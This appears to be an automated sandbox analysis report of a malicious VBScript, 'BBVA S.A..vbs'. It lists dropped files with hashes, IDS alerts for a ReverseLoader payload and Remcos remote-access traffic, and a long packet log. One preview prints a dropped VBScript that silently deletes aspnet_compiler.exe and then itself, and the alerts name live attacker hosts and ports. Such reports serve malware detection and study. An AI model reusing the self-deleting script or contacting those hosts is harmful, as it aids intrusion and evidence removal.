                                                        Preview:.. ..UvLgSGeNCcpxAdJ = "LxBfLbmGZgRPzbK"..UPhAcmLLibkKGZq = "WdCILckrOWZWQZN"..WKcAJNtWAeOGjCa = "hkPIUzbrWZKkcPp"....oexBKoGpcJNhPWf = "UgKcLuShGOKRLdW"..eKkeGitKmPcGGKq = "kpWmKUcxSkLLWWP"..ZmAcKoGiSiULiKz = "ZpcTALLmLcLsLcc"..UWfhtLKWUUgoPqz = "bTpkdCGiiKNmBaU"..zhGoUWpQaiKGjPk = "NWiNHLdpKqaZoAu"..ceWzaLmkGipLKBi = "qLaWiSQZLBeKfiK"..aunkLTutZinmRUn = "LKJbSUkGoBRccuk"..cUNLHvHLbroohHB = "iWZoiqWOxmiKLhW"..tTinsTGLtURtcBf = "KapGpWGRUzofccW"..ALUOLbaKWpcKuhk = "ccLqLKiWppTflct"..AuGmoRicLqUqiWG = "fcucCbLojmKpUWW"..LiCGiLKWxinAUzd = "cLhGHLTdanWfkzd"....zKZNoUcUmUZQPWr = "WWOKLaTGNLmgRcb"..ditpecAnWALOpBm = "kQKuWeLtLlpNKNc"..KLWJoKNiWAKNZNS = "IbKIbbqLkUhWTxZ"..WZdchzWcLWZZlNO = "kpGxcOPohLLkAfz"..ohKhLicPRazZiGz = "NUZbtKkacGoooft"..LUWcceLNOAZUaAp = "oGWcKpuCUcKPxWU"..KSNmKWpPiqkgmWG = "NTPlqLGeRzcPdzv"..LjmKWcqLxkGkqWG = "LoKZctGzAlgWLca"..nsrUmqcbxNWLaLu = "ZtncWzhzKoiLABU"....UUeiokiRZUGarxd = "oHKcABNRiUGKaPR"..eLAKGpNqGgkxKAe = "kZLftUuCccKOIsk"..SLzLsCGfriudPbn = "AACZo
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):9434
                                                        Entropy (8bit):4.928515784730612
                                                        Encrypted:false
                                                        SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                                                        MD5:D3594118838EF8580975DDA877E44DEB
                                                        SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                                                        SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                                                        SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                                                        Malicious:false
                                                        Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):64
                                                        Entropy (8bit):0.34726597513537405
                                                        Encrypted:false
                                                        SSDEEP:3:Nlll:Nll
                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                        Malicious:false
                                                        Preview:@...e...........................................................
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):390
                                                        Entropy (8bit):3.5203762121413913
                                                        Encrypted:false
                                                        SSDEEP:12:xQ4lA2++ugypjBQMB3D9+gxoIajp/VD9Z/0aimi:7a2+SMT9+gjY/h9yait
                                                        MD5:65C79EC358ABB207D3EB03CA384FAF23
                                                        SHA1:B65865FC07A3E4DE0EEE833B6C7E3B82DB4454A8
                                                        SHA-256:891D444AE2F47B67CD260CEDEB13CF9F273F0DFD5479360B91AECF7695D3A3FE
                                                        SHA-512:06F0050BF19D962B8899FFC1B557B47C24D7714337225C4A64844D9F3413F5DAE40FC7F6BE5A31BDFC9C21037D8B7AC1F9A61927CD073C4D50E81228AB697E58
                                                        Malicious:true
                                                        Preview:O.n. .E.r.r.o.r. .R.e.s.u.m.e. .N.e.x.t...S.e.t. .f.s.o. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".)...f.s.o...D.e.l.e.t.e.F.i.l.e. .".C.:.\.W.i.n.d.o.w.s.\.M.i.c.r.o.s.o.f.t...N.E.T.\.F.r.a.m.e.w.o.r.k.\.v.4...0...3.0.3.1.9.\.a.s.p.n.e.t._.c.o.m.p.i.l.e.r...e.x.e."...f.s.o...D.e.l.e.t.e.F.i.l.e.(.W.s.c.r.i.p.t...S.c.r.i.p.t.F.u.l.l.N.a.m.e.).
                                                        File type:Unicode text, UTF-16, little-endian text, with very long lines (475), with CRLF line terminators
                                                        Entropy (8bit):3.447397726048375
                                                        TrID:
                                                        • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                                        • MP3 audio (1001/1) 32.22%
                                                        • Lumena CEL bitmap (63/63) 2.03%
                                                        • Corel Photo Paint (41/41) 1.32%
                                                        File name:BBVA S.A..vbs
                                                        File size:171'308 bytes
                                                        MD5:3c217b6a70e1ff5e6ecb71ca0e89644a
                                                        SHA1:d158bcee429368797c22f4c2f9a305c2ff37beae
                                                        SHA256:4e66fdbc38893f545b9088331861312e46e612bc9f4f96a9c88b286588680bf9
                                                        SHA512:38bb4918e229bb83c0f7f4f3ca086253f22197f44887f81dbe4aad019811b91799bc9206155c99906855372cdc0eb09f778913d8d2b59423c3b5e550585672db
                                                        SSDEEP:1536:groJZFpjN3Z5cpeYTXOnBodK/fI81ltCwKoAVTmT2xc1k3TjSjjXuw7dk+aojwE3:grorj9Z5ccYKKIIyScjXx7dk+aojD
                                                        TLSH:F0F37952A3FA0108F2F72F48A9B655744A27BDA6AD7DC65D019C684D1FF3A40C870BB3
                                                        File Content Preview:..D.i.m. .s.h. .'.W.S.c.r.i.p.t...S.h.e.l.l. .o.b.j.e.c.t.....D.i.m. .f.s.o. .'.S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.....D.i.m. .f.o.r.m.a.t. .'.S.t.r.i.n.g.F.o.r.m.a.t.t.e.r. .o.b.j.e.c.t.....D.i.m. .s.u.i.t.e.F.o.l.d.e.r. .'.s.t.r.i.n.g.:
                                                        Icon Hash:68d69b8f86ab9a86
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-17T14:30:37.607592+0100 | 2841075 | ETPRO MALWARE Terse Request to paste .ee - Possible Download | 1 | 192.168.2.6 | 49784 | 104.21.84.67 | 443 | TCP
2024-12-17T14:30:38.013728+0100 | 2020424 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 | 1 | 104.21.84.67 | 443 | 192.168.2.6 | 49784 | TCP
2024-12-17T14:30:38.013728+0100 | 2020425 | ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 | 1 | 104.21.84.67 | 443 | 192.168.2.6 | 49784 | TCP
2024-12-17T14:30:39.010116+0100 | 2858295 | ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) | 1 | 104.21.84.67 | 443 | 192.168.2.6 | 49784 | TCP
2024-12-17T14:30:40.870317+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49795 | 45.80.158.30 | 23101 | TCP
2024-12-17T14:30:43.373018+0100 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.6 | 49803 | 178.237.33.50 | 80 | TCP
2024-12-17T14:30:54.120307+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49829 | 45.80.158.30 | 23101 | TCP
2024-12-17T14:30:54.261015+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49830 | 45.80.158.30 | 23101 | TCP
2024-12-17T14:31:15.065246+0100 | 2841075 | ETPRO MALWARE Terse Request to paste .ee - Possible Download | 1 | 192.168.2.6 | 49880 | 104.21.84.67 | 443 | TCP
2024-12-17T14:31:15.461826+0100 | 2020424 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 | 1 | 104.21.84.67 | 443 | 192.168.2.6 | 49880 | TCP
2024-12-17T14:31:15.461826+0100 | 2020425 | ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 | 1 | 104.21.84.67 | 443 | 192.168.2.6 | 49880 | TCP
2024-12-17T14:31:16.431606+0100 | 2858295 | ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) | 1 | 104.21.84.67 | 443 | 192.168.2.6 | 49880 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 17, 2024 14:30:04.019671917 CET | 49713 | 443 | 192.168.2.6 | 45.63.94.214
Dec 17, 2024 14:30:04.019756079 CET | 443 | 49713 | 45.63.94.214 | 192.168.2.6
Dec 17, 2024 14:30:04.019886017 CET | 49713 | 443 | 192.168.2.6 | 45.63.94.214
Dec 17, 2024 14:30:04.060190916 CET | 49713 | 443 | 192.168.2.6 | 45.63.94.214
Dec 17, 2024 14:30:04.060230017 CET | 443 | 49713 | 45.63.94.214 | 192.168.2.6
Dec 17, 2024 14:30:05.830607891 CET | 443 | 49713 | 45.63.94.214 | 192.168.2.6
Dec 17, 2024 14:30:05.830765963 CET | 49713 | 443 | 192.168.2.6 | 45.63.94.214
Dec 17, 2024 14:30:05.889131069 CET | 49713 | 443 | 192.168.2.6 | 45.63.94.214
Dec 17, 2024 14:30:05.889215946 CET | 443 | 49713 | 45.63.94.214 | 192.168.2.6
Dec 17, 2024 14:30:05.889911890 CET | 443 | 49713 | 45.63.94.214 | 192.168.2.6
Dec 17, 2024 14:30:05.889996052 CET | 49713 | 443 | 192.168.2.6 | 45.63.94.214
Dec 17, 2024 14:30:05.892326117 CET | 49713 | 443 | 192.168.2.6 | 45.63.94.214
Dec 17, 2024 14:30:05.939321041 CET | 443 | 49713 | 45.63.94.214 | 192.168.2.6
Dec 17, 2024 14:30:06.398354053 CET | 443 | 49713 | 45.63.94.214 | 192.168.2.6
Dec 17, 2024 14:30:06.398390055 CET | 443 | 49713 | 45.63.94.214 | 192.168.2.6
Dec 17, 2024 14:30:06.398433924 CET | 443 | 49713 | 45.63.94.214 | 192.168.2.6
Dec 17, 2024 14:30:06.398507118 CET | 49713 | 443 | 192.168.2.6 | 45.63.94.214
Dec 17, 2024 14:30:06.398525000 CET | 443 | 49713 | 45.63.94.214 | 192.168.2.6
Dec 17, 2024 14:30:06.398562908 CET | 49713 | 443 | 192.168.2.6 | 45.63.94.214
Dec 17, 2024 14:30:06.398591042 CET | 49713 | 443 | 192.168.2.6 | 45.63.94.214
Dec 17, 2024 14:30:06.513685942 CET | 443 | 49713 | 45.63.94.214 | 192.168.2.6
Dec 17, 2024 14:30:06.513761997 CET | 443 | 49713 | 45.63.94.214 | 192.168.2.6
Dec 17, 2024 14:30:06.513813972 CET | 49713 | 443 | 192.168.2.6 | 45.63.94.214
Dec 17, 2024 14:30:06.513876915 CET | 443 | 49713 | 45.63.94.214 | 192.168.2.6
Dec 17, 2024 14:30:06.513912916 CET | 49713 | 443 | 192.168.2.6 | 45.63.94.214
Dec 17, 2024 14:30:06.513933897 CET | 49713 | 443 | 192.168.2.6 | 45.63.94.214
Dec 17, 2024 14:30:06.559161901 CET | 443 | 49713 | 45.63.94.214 | 192.168.2.6
Dec 17, 2024 14:30:06.559210062 CET | 443 | 49713 | 45.63.94.214 | 192.168.2.6
Dec 17, 2024 14:30:06.559248924 CET | 49713 | 443 | 192.168.2.6 | 45.63.94.214
Dec 17, 2024 14:30:06.559263945 CET | 443 | 49713 | 45.63.94.214 | 192.168.2.6
Dec 17, 2024 14:30:06.559324980 CET | 49713 | 443 | 192.168.2.6 | 45.63.94.214
Dec 17, 2024 14:30:06.682549000 CET | 443 | 49713 | 45.63.94.214 | 192.168.2.6
Dec 17, 2024 14:30:06.682648897 CET | 443 | 49713 | 45.63.94.214 | 192.168.2.6
Dec 17, 2024 14:30:06.682657957 CET | 49713 | 443 | 192.168.2.6 | 45.63.94.214
Dec 17, 2024 14:30:06.682714939 CET | 443 | 49713 | 45.63.94.214 | 192.168.2.6
Dec 17, 2024 14:30:06.682745934 CET | 49713 | 443 | 192.168.2.6 | 45.63.94.214
Dec 17, 2024 14:30:06.682796001 CET | 49713 | 443 | 192.168.2.6 | 45.63.94.214
Dec 17, 2024 14:30:06.707267046 CET | 443 | 49713 | 45.63.94.214 | 192.168.2.6
Dec 17, 2024 14:30:06.707375050 CET | 443 | 49713 | 45.63.94.214 | 192.168.2.6
Dec 17, 2024 14:30:06.707382917 CET | 49713 | 443 | 192.168.2.6 | 45.63.94.214
Dec 17, 2024 14:30:06.707406998 CET | 443 | 49713 | 45.63.94.214 | 192.168.2.6
Dec 17, 2024 14:30:06.707454920 CET | 49713 | 443 | 192.168.2.6 | 45.63.94.214
Dec 17, 2024 14:30:06.707454920 CET | 49713 | 443 | 192.168.2.6 | 45.63.94.214
Dec 17, 2024 14:30:06.707479954 CET | 443 | 49713 | 45.63.94.214 | 192.168.2.6
Dec 17, 2024 14:30:06.707612038 CET | 443 | 49713 | 45.63.94.214 | 192.168.2.6
Dec 17, 2024 14:30:06.707663059 CET | 49713 | 443 | 192.168.2.6 | 45.63.94.214
Dec 17, 2024 14:30:06.707781076 CET | 49713 | 443 | 192.168.2.6 | 45.63.94.214
Dec 17, 2024 14:30:06.707814932 CET | 443 | 49713 | 45.63.94.214 | 192.168.2.6
Dec 17, 2024 14:30:35.904792070 CET | 49784 | 443 | 192.168.2.6 | 104.21.84.67
Dec 17, 2024 14:30:35.904820919 CET | 443 | 49784 | 104.21.84.67 | 192.168.2.6
Dec 17, 2024 14:30:35.904917002 CET | 49784 | 443 | 192.168.2.6 | 104.21.84.67
Dec 17, 2024 14:30:35.905478954 CET | 49784 | 443 | 192.168.2.6 | 104.21.84.67
Dec 17, 2024 14:30:35.905504942 CET | 443 | 49784 | 104.21.84.67 | 192.168.2.6
Dec 17, 2024 14:30:37.151572943 CET | 443 | 49784 | 104.21.84.67 | 192.168.2.6
Dec 17, 2024 14:30:37.151674986 CET | 49784 | 443 | 192.168.2.6 | 104.21.84.67
Dec 17, 2024 14:30:37.153127909 CET | 49784 | 443 | 192.168.2.6 | 104.21.84.67
Dec 17, 2024 14:30:37.153158903 CET | 443 | 49784 | 104.21.84.67 | 192.168.2.6
Dec 17, 2024 14:30:37.153507948 CET | 443 | 49784 | 104.21.84.67 | 192.168.2.6
Dec 17, 2024 14:30:37.154467106 CET | 49784 | 443 | 192.168.2.6 | 104.21.84.67
Dec 17, 2024 14:30:37.199342012 CET | 443 | 49784 | 104.21.84.67 | 192.168.2.6
Dec 17, 2024 14:30:37.607609034 CET | 443 | 49784 | 104.21.84.67 | 192.168.2.6
Dec 17, 2024 14:30:37.607702017 CET | 443 | 49784 | 104.21.84.67 | 192.168.2.6
Dec 17, 2024 14:30:37.607764959 CET | 49784 | 443 | 192.168.2.6 | 104.21.84.67
Dec 17, 2024 14:30:37.607781887 CET | 443 | 49784 | 104.21.84.67 | 192.168.2.6
Dec 17, 2024 14:30:37.607829094 CET | 443 | 49784 | 104.21.84.67 | 192.168.2.6
Dec 17, 2024 14:30:37.607889891 CET | 49784 | 443 | 192.168.2.6 | 104.21.84.67
Dec 17, 2024 14:30:37.607907057 CET | 443 | 49784 | 104.21.84.67 | 192.168.2.6
Dec 17, 2024 14:30:37.615777016 CET | 443 | 49784 | 104.21.84.67 | 192.168.2.6
Dec 17, 2024 14:30:37.615879059 CET | 49784 | 443 | 192.168.2.6 | 104.21.84.67
Dec 17, 2024 14:30:37.615894079 CET | 443 | 49784 | 104.21.84.67 | 192.168.2.6
Dec 17, 2024 14:30:37.630759001 CET | 443 | 49784 | 104.21.84.67 | 192.168.2.6
Dec 17, 2024 14:30:37.630817890 CET | 49784 | 443 | 192.168.2.6 | 104.21.84.67
Dec 17, 2024 14:30:37.630826950 CET | 443 | 49784 | 104.21.84.67 | 192.168.2.6
Dec 17, 2024 14:30:37.688364029 CET | 49784 | 443 | 192.168.2.6 | 104.21.84.67
Dec 17, 2024 14:30:37.688384056 CET | 443 | 49784 | 104.21.84.67 | 192.168.2.6
Dec 17, 2024 14:30:37.799576998 CET | 443 | 49784 | 104.21.84.67 | 192.168.2.6
Dec 17, 2024 14:30:37.799631119 CET | 443 | 49784 | 104.21.84.67 | 192.168.2.6
Dec 17, 2024 14:30:37.799664974 CET | 49784 | 443 | 192.168.2.6 | 104.21.84.67
Dec 17, 2024 14:30:37.799694061 CET | 443 | 49784 | 104.21.84.67 | 192.168.2.6
Dec 17, 2024 14:30:37.799741030 CET | 49784 | 443 | 192.168.2.6 | 104.21.84.67
Dec 17, 2024 14:30:37.803407907 CET | 443 | 49784 | 104.21.84.67 | 192.168.2.6
Dec 17, 2024 14:30:37.811139107 CET | 443 | 49784 | 104.21.84.67 | 192.168.2.6
Dec 17, 2024 14:30:37.811192989 CET | 49784 | 443 | 192.168.2.6 | 104.21.84.67
Dec 17, 2024 14:30:37.811206102 CET | 443 | 49784 | 104.21.84.67 | 192.168.2.6
Dec 17, 2024 14:30:37.819241047 CET | 443 | 49784 | 104.21.84.67 | 192.168.2.6
Dec 17, 2024 14:30:37.819288969 CET | 49784 | 443 | 192.168.2.6 | 104.21.84.67
Dec 17, 2024 14:30:37.819298983 CET | 443 | 49784 | 104.21.84.67 | 192.168.2.6
Dec 17, 2024 14:30:37.827554941 CET | 443 | 49784 | 104.21.84.67 | 192.168.2.6
Dec 17, 2024 14:30:37.827605963 CET | 49784 | 443 | 192.168.2.6 | 104.21.84.67
Dec 17, 2024 14:30:37.827617884 CET | 443 | 49784 | 104.21.84.67 | 192.168.2.6
Dec 17, 2024 14:30:37.834460974 CET | 443 | 49784 | 104.21.84.67 | 192.168.2.6
Dec 17, 2024 14:30:37.834507942 CET | 49784 | 443 | 192.168.2.6 | 104.21.84.67
Dec 17, 2024 14:30:37.834521055 CET | 443 | 49784 | 104.21.84.67 | 192.168.2.6
Dec 17, 2024 14:30:37.842062950 CET | 443 | 49784 | 104.21.84.67 | 192.168.2.6
Dec 17, 2024 14:30:37.844158888 CET | 49784 | 443 | 192.168.2.6 | 104.21.84.67
Dec 17, 2024 14:30:37.844166994 CET | 443 | 49784 | 104.21.84.67 | 192.168.2.6
Dec 17, 2024 14:30:37.849781990 CET | 443 | 49784 | 104.21.84.67 | 192.168.2.6
Dec 17, 2024 14:30:37.853384972 CET | 49784 | 443 | 192.168.2.6 | 104.21.84.67
Dec 17, 2024 14:30:37.853394032 CET | 443 | 49784 | 104.21.84.67 | 192.168.2.6
Dec 17, 2024 14:30:37.865195036 CET | 443 | 49784 | 104.21.84.67 | 192.168.2.6
Dec 17, 2024 14:30:37.865432978 CET | 443 | 49784 | 104.21.84.67 | 192.168.2.6
Dec 17, 2024 14:30:37.865490913 CET | 49784 | 443 | 192.168.2.6 | 104.21.84.67
Dec 17, 2024 14:30:37.865502119 CET | 443 | 49784 | 104.21.84.67 | 192.168.2.6
Dec 17, 2024 14:30:37.865554094 CET | 49784 | 443 | 192.168.2.6 | 104.21.84.67
                                                        Dec 17, 2024 14:30:37.873239040 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.879113913 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.879187107 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:37.879195929 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.886229038 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.886296988 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:37.886305094 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.893610954 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.893665075 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:37.893673897 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.911684990 CET49790443192.168.2.645.63.94.214
                                                        Dec 17, 2024 14:30:37.911755085 CET4434979045.63.94.214192.168.2.6
                                                        Dec 17, 2024 14:30:37.911853075 CET49790443192.168.2.645.63.94.214
                                                        Dec 17, 2024 14:30:37.979743004 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:37.992867947 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.994849920 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.994920015 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:37.994956017 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.004355907 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.004364967 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.004424095 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.004443884 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.013736010 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.013806105 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.013825893 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.013884068 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.018013954 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.018089056 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.026362896 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.026374102 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.026447058 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.040714979 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.040724993 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.040760040 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.040776014 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.040853024 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.040868044 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.046834946 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.046894073 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.046911955 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.046966076 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.052319050 CET49790443192.168.2.645.63.94.214
                                                        Dec 17, 2024 14:30:38.052351952 CET4434979045.63.94.214192.168.2.6
                                                        Dec 17, 2024 14:30:38.055094004 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.055104017 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.055166006 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.063394070 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.063462973 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.067715883 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.068025112 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.075815916 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.075964928 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.080095053 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.080169916 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.183931112 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.184009075 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.186465979 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.186531067 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.192914009 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.192986965 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.199459076 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.199542999 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.205513954 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.205574036 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.208619118 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.208683968 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.214416981 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.214478970 CET49784443192.168.2.6104.21.84.67
